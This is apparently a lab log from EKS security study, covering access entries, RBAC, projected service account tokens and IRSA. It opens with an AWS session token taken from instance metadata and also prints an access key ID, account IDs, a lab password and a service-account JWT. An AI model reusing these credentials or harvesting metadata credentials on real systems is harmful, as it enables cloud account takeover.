"Token" : "IQoJb3JpZ2luX2VjECcaDmFwLW5vcnRoZWFzdC0yIkYwRAIgRhe1HYJN3bBxErWe5CGJJGwstnPNDER/ky+bcKx7kgwCIGGGTSecT1cikanId3PssqlUOOrO/BG3DGMYVURDcl3cKswFCGAQARoMMjM2NzQ3ODMzOTUzIgwvypWs2vej2GLe4nIqqQXbyPQrp6vW8M7RwusZIMJkOgTnLWnJ++20NmBa9QNBx1o2kYPonB6uiWtpcG2V1w9/dfAFMVyswqlmenkw8SZPAnACVOBc+ydSKprGdf3eT4N452Y6cY1huGxlMVVch6KrOjrizoX+qtblvfZGDR7hHA3S9/WAbVk78NuAHUT8mD1HjVNEuRu4TmeC8HApwKtymLuo8fX9qqr9pTr+h0aYd82Dp+rOMar+t2AKD8TmvkkuMjiQBNJqAH2nP3TcoGsomlfX+/FYytB13sBLzMs3C2QxiCnan24b6lJNCx9gjsgERSOnfqm76V5AvRPrnFeEadhX0PixmsXnL7D58/eQnrCkeVBTxEVLaDe9LLo9ptCe+67Bs1CbEMbQCMvwR/8wKtipY5uKASrH9yRq+s2FmmCT6XELfpxarBDd2YyHAt5SegBXPZJSjnZFLAuba8a2djGauKeXRLcYu0XLwXIVNpiSPl+L7IjVO3OeYtaPpBi+QIj+naqDWE+xKMTTitwFzME+DFSyM89xmEWvubJEzXbf+Wr8W9SSvdtxovmdKRSy6A8A4Y5/N87Iesb5vil7dllptgDGGc/39xlmTBhTR7mUniF4zz6rhaYQw+wVkLeAYis0nid96Lm4KTYaxBkAd6vrunvQo3/vScBpVv2G/CXOdYpMsCLB4FE8bIhP6CzZoy/EsK7e7lGGL1Ayfrxnt2Pb7aN57w+aN1j3SoN0jY+UYKxSLT2X0AH536SjnPofsUM6irv+Cgo4PsMQ29owUbF5zkI68gSa1sPaC+eyzHPY9YtArAMgmABPrK9AQNGtBG1uQRfxfsLivD3+N5XJ6wn/UIjRGTIsffnvOsRqX5ytL1oVcADEOsOHD0NzajQbo4EnuVCZWKj61NUnxf+qmJJAEgXlBrEw9ZHlsAY6sgGki7JEAgVA8CvpZFWrt2PKY16+PKpkkc0vDLO8NbS8gkApNnY96T50UcI3932HeXd/n26d1pBCYY4XB1up1TW1MTR0NU0RUoi4FJsiu8FVpy1UAv9bG9QMWxLmuSqTU0xXDBmAbvaq9X9QmAFm+jEG9Tpm/SABW4MxnZ/HY5qKDw2IH+88KiGyt/Xj7KMxzRvaTUE/A/NXcWCa8pitnZl/RW4GvDL1lFL5gzNDia6efe4D",
"Expiration" : "2024-04-12T20:52:39Z"
}
## The credentials printed above can be used from anywhere that can reach the AWS APIs until they expire - dangerous
exit
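One common mitigation, shown here only as a sketch (the instance ID is a placeholder and this is not run in the lab): keep IMDSv2 required and drop the PUT response hop limit to 1 so that pods on the regular pod network cannot reach the metadata service.
# hypothetical hardening: require IMDSv2 and limit the hop count to 1
aws ec2 modify-instance-metadata-options --instance-id <instance-id> \
  --http-tokens required --http-put-response-hop-limit 1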
New feature: A deep dive into simplified Amazon EKS access management controls
Enabled by default.
EKS console → Access: IAM access entries
EKS console → check the access configuration mode: "EKS API and ConfigMap" ← when policies overlap, the EKS API entry takes precedence and the ConfigMap entry is ignored
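To check the current mode from the CLI rather than the console (assuming an AWS CLI recent enough to expose accessConfig in describe-cluster):
# show the cluster's current authentication mode (API / API_AND_CONFIG_MAP / CONFIG_MAP)
aws eks describe-cluster --name $CLUSTER_NAME --query 'cluster.accessConfig.authenticationMode' --output text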
# Switch the access mode to EKS API
aws eks update-cluster-config --name $CLUSTER_NAME --access-config authenticationMode=API
# List all access policies: the access policies supported for cluster access management
## AmazonEKSClusterAdminPolicy - cluster administrator
## AmazonEKSAdminPolicy - administrator
## AmazonEKSEditPolicy - edit
## AmazonEKSViewPolicy - view
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-access-policies | jq
{
"accessPolicies": [
{
"name": "AmazonEKSAdminPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSAdminPolicy"
},
{
"name": "AmazonEKSClusterAdminPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy"
},
{
"name": "AmazonEKSEditPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSEditPolicy"
},
{
"name": "AmazonEKSViewPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy"
},
{
"name": "AmazonEMRJobPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEMRJobPolicy"
}
]
}
# Check the ClusterRoles these access policies map to
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get clusterroles -l 'kubernetes.io/bootstrapping=rbac-defaults' | grep -v 'system:'
NAME CREATED AT
admin 2024-04-12T11:54:42Z
cluster-admin 2024-04-12T11:54:42Z
edit 2024-04-12T11:54:42Z
view 2024-04-12T11:54:42Z
kubectl describe clusterroles admin
kubectl describe clusterroles cluster-admin
kubectl describe clusterroles edit
kubectl describe clusterroles view
Note: once the cluster is in API-only mode, the aws-auth ConfigMap can no longer be used.
# Create an access entry for testuser
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/56c7696d-9b7b-6128-2887-ad677a81b0cc",
"createdAt": "2024-04-13T00:09:25.714000+09:00",
"modifiedAt": "2024-04-13T00:09:25.714000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[]
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
arn:aws:iam::236747833953:user/leeeuijoo
arn:aws:iam::236747833953:user/testuser
# Associate AmazonEKSClusterAdminPolicy with testuser
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks associate-access-policy --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser \
> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster
{
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"associatedAccessPolicy": {
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T00:10:04.648000+09:00",
"modifiedAt": "2024-04-13T00:10:04.648000+09:00"
}
}
# associated-access-policy
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"associatedAccessPolicies": [
{
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T00:10:04.648000+09:00",
"modifiedAt": "2024-04-13T00:10:04.648000+09:00"
}
],
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser"
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/56c7696d-9b7b-6128-2887-ad677a81b0cc",
"createdAt": "2024-04-13T00:09:25.714000+09:00",
"modifiedAt": "2024-04-13T00:09:25.714000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
# Check testuser's identity
(testuser:default) [root@myeks2-bastion-2 ~]# clear
(testuser:default) [root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/testuser"
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl whoami
arn:aws:iam::236747833953:user/testuser
# Try kubectl
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get pod -v6
I0413 00:15:04.242775 2928 loader.go:395] Config loaded from file: /root/.kube/config
I0413 00:15:05.288504 2928 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 1024 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 35m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 35m
$ kubectl api-resources -v5
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::236747833953:user/testuser",
UID: "aws-iam-authenticator:236747833953:AIDATOH2FIJQZQUSI5J7W",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIATOH2FIJQSSIHIZGL"],
arn: ["arn:aws:iam::236747833953:user/testuser"],
canonicalArn: ["arn:aws:iam::236747833953:user/testuser"],
principalId: ["AIDATOH2FIJQZQUSI5J7W"],
sessionName: [""]}}
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i get pods --all-namespaces
yes
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
yes
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
      username: system:node:{{EC2PrivateDNSName}}
  mapUsers: |
    []
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
(testuser:default) [root@myeks2-bastion-2 ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
# 기존 testuser access entry 제거
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks delete-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[]
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
arn:aws:iam::236747833953:user/leeeuijoo
# Cluster Role 생성
cat <<EoF> ~/pod-viewer-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-viewer-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
EoF
cat <<EoF> ~/pod-admin-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-admin-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["*"]
EoF
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl apply -f ~/pod-viewer-role.yaml
clusterrole.rbac.authorization.k8s.io/pod-viewer-role created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl apply -f ~/pod-admin-role.yaml
clusterrole.rbac.authorization.k8s.io/pod-admin-role created
# Rolebinding
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create clusterrolebinding viewer-role-binding --clusterrole=pod-viewer-role --group=pod-viewer
clusterrolebinding.rbac.authorization.k8s.io/viewer-role-binding created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create clusterrolebinding admin-role-binding --clusterrole=pod-admin-role --group=pod-admin
clusterrolebinding.rbac.authorization.k8s.io/admin-role-binding created
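Before wiring these groups to an access entry, the bindings can be sanity-checked from the admin session with impersonation (dummy-user is just an illustrative principal name):
# expected: yes for list, no for delete when acting as the pod-viewer group
kubectl auth can-i list pods --all-namespaces --as dummy-user --as-group pod-viewer
kubectl auth can-i delete pods --all-namespaces --as dummy-user --as-group pod-viewer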
# Create the access entry
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-viewer
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:22:49.157000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
{
"associatedAccessPolicies": [],
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser"
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:22:49.157000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
# testuser 정보 확인
(testuser:default) [root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/testuser"
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl whoami
arn:aws:iam::236747833953:user/testuser
# kubectl 시도
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get pod -v6
I0413 00:25:55.944784 3495 loader.go:395] Config loaded from file: /root/.kube/config
I0413 00:25:57.126403 3495 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 1159 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 46m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 46m
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i get pods --all-namespaces
yes
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
no # denied: "delete" is not among the verbs granted by the pod-viewer ClusterRole
-------- the relevant rule --------
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks update-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-admin | jq -r .accessEntry
{
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-admin"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:28:00.909000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "myeks2",
"principalArn": "arn:aws:iam::236747833953:user/testuser",
"kubernetesGroups": [
"pod-admin"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:236747833953:access-entry/myeks2/user/236747833953/testuser/cec76973-bcae-97f3-ed33-ca89066280ce",
"createdAt": "2024-04-13T00:22:49.157000+09:00",
"modifiedAt": "2024-04-13T00:28:00.909000+09:00",
"tags": {},
"username": "arn:aws:iam::236747833953:user/testuser",
"type": "STANDARD"
}
}
# testuser delete pod 가능 한지 확인
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
yes
# 설정 예시 1 : eksctl 사용 시
eksctl create cluster --name $CLUSTER_NAME ... --external-dns-access --full-ecr-access --asg-access
# 설정 예시 2 : eksctl로 yaml 파일로 노드 생성 시
cat myeks.yaml | yh
...
managedNodeGroups:
- amiFamily: AmazonLinux2
iam:
withAddonPolicies:
albIngress: false
appMesh: false
appMeshPreview: false
autoScaler: true
awsLoadBalancerController: false
certManager: true
cloudWatch: true
ebs: false
efs: false
externalDNS: true
fsx: false
imageBuilder: true
xRay: false
...
Prerequisite knowledge: Service Account Token Volume Projection, Admission Control, JWT (JSON Web Token), OIDC
Service Account Token Volume Projection
Using the Service Account Token Volume Projection feature addresses the shortcomings of the legacy service account token (no audience binding, no expiry, no coupling to the pod's lifetime). Example pod spec:
apiVersion: v1
kind: Pod
metadata:
name: nginx
spec:
containers:
- image: nginx
name: nginx
volumeMounts:
- mountPath: /var/run/secrets/tokens
name: vault-token
serviceAccountName: build-robot
volumes:
- name: vault-token
projected:
sources:
- serviceAccountToken:
path: vault-token
expirationSeconds: 7200
audience: vault
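For the example above to run, the referenced build-robot ServiceAccount must exist; a minimal sketch to try it and confirm the projected token shows up at the requested path (the manifest filename is illustrative):
# create the ServiceAccount the pod references, apply the manifest above, then check the mount
kubectl create serviceaccount build-robot
kubectl apply -f nginx-projected-token.yaml
kubectl exec nginx -- ls /var/run/secrets/tokens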
Bound Service Account Token Volume
Kubernetes v1.22 [stable]
- name: kube-api-access-<random-suffix>
projected:
defaultMode: 420 # 420 (decimal) = 0644 (octal): owner read/write, group and others read-only
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
The projected volume is composed of three sources:
1. A ServiceAccountToken obtained from the kube-apiserver via the TokenRequest API. By default it expires after 1 hour, or when the pod is deleted; the token is bound to the pod and intended for the kube-apiserver.
2. A ConfigMap (kube-root-ca.crt) carrying the cluster CA certificate.
3. A DownwardAPI source exposing the pod's namespace.
Configure a Pod to Use a Projected Volume for Storage : consolidates the secret, configMap, downwardAPI, and serviceAccountToken volume mounts into a single directory.
apiVersion: v1
kind: Pod
metadata:
name: test-projected-volume
spec:
containers:
- name: test-projected-volume
image: busybox:1.28
args:
- sleep
- "86400"
volumeMounts:
- name: all-in-one
mountPath: "/projected-volume"
readOnly: true
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
# 시크릿 생성
## Create files containing the username and password:
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -n "admin" > ./username.txt
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -n "1f2d1e2e67df" > ./password.txt
## Package these files into secrets:
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create secret generic user --from-file=./username.txt
secret/user created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create secret generic pass --from-file=./password.txt
secret/pass created
# 파드 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl apply -f https://k8s.io/examples/pods/storage/projected.yaml
pod/test-projected-volume created
# 파드 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod test-projected-volume -o yaml | ...
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
- name: kube-api-access-z7xpl
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
# 시크릿 확인
## confirms that both secrets are bundled together under the single projected directory
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it test-projected-volume -- ls /projected-volume/
password.txt username.txt
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it test-projected-volume -- cat /projected-volume/username.txt ;echo
admin
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it test-projected-volume -- cat /projected-volume/password.txt ;echo
1f2d1e2e67df
# 리소스 삭제
kubectl delete pod test-projected-volume && kubectl delete secret user pass
Kubernetes API access flow
Admission Control is also opened up to users through webhooks: you can implement your own admission controller, called a Dynamic Admission Controller, which is broadly split into MutatingWebhook and ValidatingWebhook.
MutatingWebhook : the cluster operator modifies values in the user's request before it is persisted.
ValidatingWebhook : the cluster operator validates the user's request and can reject it.
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 3h31m
eks-aws-auth-configmap-validation-webhook 1 3h51m
kube-prometheus-stack-admission 1 3h28m
vpc-resource-validating-webhook 2 3h51m
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 3h31m
kube-prometheus-stack-admission 1 3h28m
pod-identity-webhook 1 3h51m
vpc-resource-mutating-webhook 1 3h51m
JWT : Bearer type - JWT (JSON Web Token), a lightweight JSON counterpart to an X.509 certificate; the base64url-encoded header, payload, and signature are joined with "." characters.
OIDC : a protocol that authenticates a user so the user can be granted access ⇒ [커피고래] blog post, OpenID Connect - link
Common ID token claims:
iss : token issuer
sub : unique identifier distinguishing the user
email : the user's email address
iat : time the token was issued, in Unix time
exp : time the token expires, in Unix time
aud : the client the ID token was issued for
IRSA 소개 : 파드가 특정 IAM 역할로 Assume 할때 토큰을 AWS에 전송하고, AWS는 토큰과 EKS IdP를 통해 해당 IAM 역할을 사용할 수 있는지 검증
동작
실습
# 파드1 생성
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test1
spec:
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
args: ['s3', 'ls']
restartPolicy: Never
automountServiceAccountToken: false # Token 만들지 않습니다.
terminationGracePeriodSeconds: 0
EOF
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 73m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 73m
eks-iam-test1 0/1 Error 0 16s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl logs eks-iam-test1
# s3 ls 권한이 없음
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied
# 파드1 삭제
kubectl delete pod eks-iam-test1
# 파드2 생성
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test2
spec:
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 83m
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 83m
eks-iam-test2 1/1 Running 0 49s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-iam-test2 -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test2
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-vr7sm
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: default
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-vr7sm
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test2 -- ls /var/run/secrets/kubernetes.io/serviceaccount
ca.crt namespace token
# aws 서비스 사용 시도
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test2 -- aws s3 ls
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied
command terminated with exit code 254
# 서비스 어카운트 토큰 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# SA_TOKEN=$(kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo $SA_TOKEN
eyJhbGciOiJSUzI1NiIsImtpZCI6ImRiNmQ0MTNmZTdiM2JiMmRmNWE3ZWFmOGUyNTI2ZjNlNzJmODhkN2EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NDQ3MzczMiwiaWF0IjoxNzEyOTM3NzMyLCJpc3MiOiJodHRwczovL29pZGMuZWtzLmFwLW5vcnRoZWFzdC0yLmFtYXpvbmF3cy5jb20vaWQvRDNDMTg1MkFENzZCNEY3QUNCMzA1RTg0QzBFM0ZBRDUiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImRlZmF1bHQiLCJwb2QiOnsibmFtZSI6ImVrcy1pYW0tdGVzdDIiLCJ1aWQiOiJjN2IxMjM2Zi03ZWJhLTRjYjYtODE3Mi03ZmQyNTFlZWEwZjUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlZmF1bHQiLCJ1aWQiOiI5NTczODg4NC1iYTlhLTQ3MGMtOTE0Zi1lMDE3ZWZhYTU1MjQifSwid2FybmFmdGVyIjoxNzEyOTQxMzM5fSwibmJmIjoxNzEyOTM3NzMyLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpkZWZhdWx0In0.q6XA13a-KlRbPyc-BN1-_phfx1i8X_aL0OWW98-QWw2Stwhqo_rQxt7MyaZ43YBanMYeu_i__ejogOsdvYu5bG66vVweFODYC1153WJ-YUJQP-D8g0ggNoprSw7tQVjGWf--NZpL1kNX_S2-ZCVUx40ENpOZZZKaO1BjPY5qT3ydN-PjQkX_bQ1IF-Vh2x8EN8lpoSGF_kI9Dy1k5avYx63l-ZTjOol2z95r8AQ2el6DNs-YSFkFACOoKJ7fIq3R0oPriryIo0clG_qkzha6xGxyw25hChMIRE7miPFKBmGrPZ6IuW-pqEVE835cRALjW9e77tWXYvbzCnQZkFpPSA
# jwt 혹은 아래 JWT 웹 사이트 이용 https://jwt.io/
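As a local alternative to jwt.io, the payload (the second dot-separated field) can be base64url-decoded in the shell; a minimal sketch, assuming jq is installed on the bastion (PAYLOAD is a throwaway helper variable):
# base64url -> base64: swap URL-safe characters and pad to a multiple of 4, then decode
PAYLOAD=$(echo "$SA_TOKEN" | cut -d. -f2 | tr '_-' '/+')
while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD="${PAYLOAD}="; done
echo "$PAYLOAD" | base64 -d | jq '{iss, aud, exp, sub}'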
# 헤더
{
"alg": "RS256",
"kid": "db6d413fe7b3bb2df5a7eaf8e2526f3e72f88d7a"
}
# Payload: note the aud and exp attributes used in OAuth2 - the projected ServiceAccountToken feature appends the audience and exp fields to the token
## iss attribute: the EKS OpenID Connect Provider (EKS IdP) address - this EKS IdP is used to verify that tokens issued by Kubernetes are valid
{
"aud": [
"https://kubernetes.default.svc" # 해당 주소는 k8s api의 ClusterIP 서비스 주소 도메인명, kubectl get svc kubernetes
],
"exp": 1744473732,
"iat": 1712937732,
"iss": "https://oidc.eks.ap-northeast-2.amazonaws.com/id/D3C1852AD76B4F7ACB305E84C0E3FAD5",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "eks-iam-test2",
"uid": "c7b1236f-7eba-4cb6-8172-7fd251eea0f5"
},
"serviceaccount": {
"name": "default",
"uid": "95738884-ba9a-470c-914f-e017efaa5524"
},
"warnafter": 1712941339
},
"nbf": 1712937732,
"sub": "system:serviceaccount:default:default"
}
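The iss claim should match this cluster's own OIDC issuer URL, which can be cross-checked directly:
# the issuer embedded in the token must equal the cluster's OIDC issuer
aws eks describe-cluster --name $CLUSTER_NAME --query "cluster.identity.oidc.issuer" --output text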
# 파드2 삭제
kubectl delete pod eks-iam-test2
